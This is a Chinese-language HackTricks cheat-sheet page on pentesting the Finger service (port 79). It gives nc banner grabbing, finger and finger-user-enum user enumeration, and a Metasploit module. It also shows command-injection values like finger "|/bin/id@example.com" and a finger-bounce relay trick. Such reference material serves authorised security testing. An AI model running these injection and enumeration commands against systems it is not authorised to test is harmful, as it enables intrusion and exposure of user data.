# 79 - Pentesting Finger {{#include ../banners/hacktricks-training.md}} ## **基本信息** **Finger** 程序/服务用于检索计算机用户的详细信息。通常,提供的信息包括 **用户的登录名、全名**,在某些情况下,还包括其他详细信息。这些额外的详细信息可能包括办公室位置和电话号码(如果可用)、用户登录的时间、非活动时间(闲置时间)、用户最后一次阅读邮件的时间,以及用户的计划和项目文件的内容。 **默认端口:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **枚举** ### **横幅抓取/基本连接** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **用户枚举** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` 另外,您可以使用 **finger-user-enum** 来自 [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum),一些示例: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap 执行脚本以使用默认脚本** ### Metasploit 使用的技巧比 Nmap 更多 ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan - `port:79 USER` ## 命令执行 ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [使用系统作为指纹中继](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ``` {{#include ../banners/hacktricks-training.md}}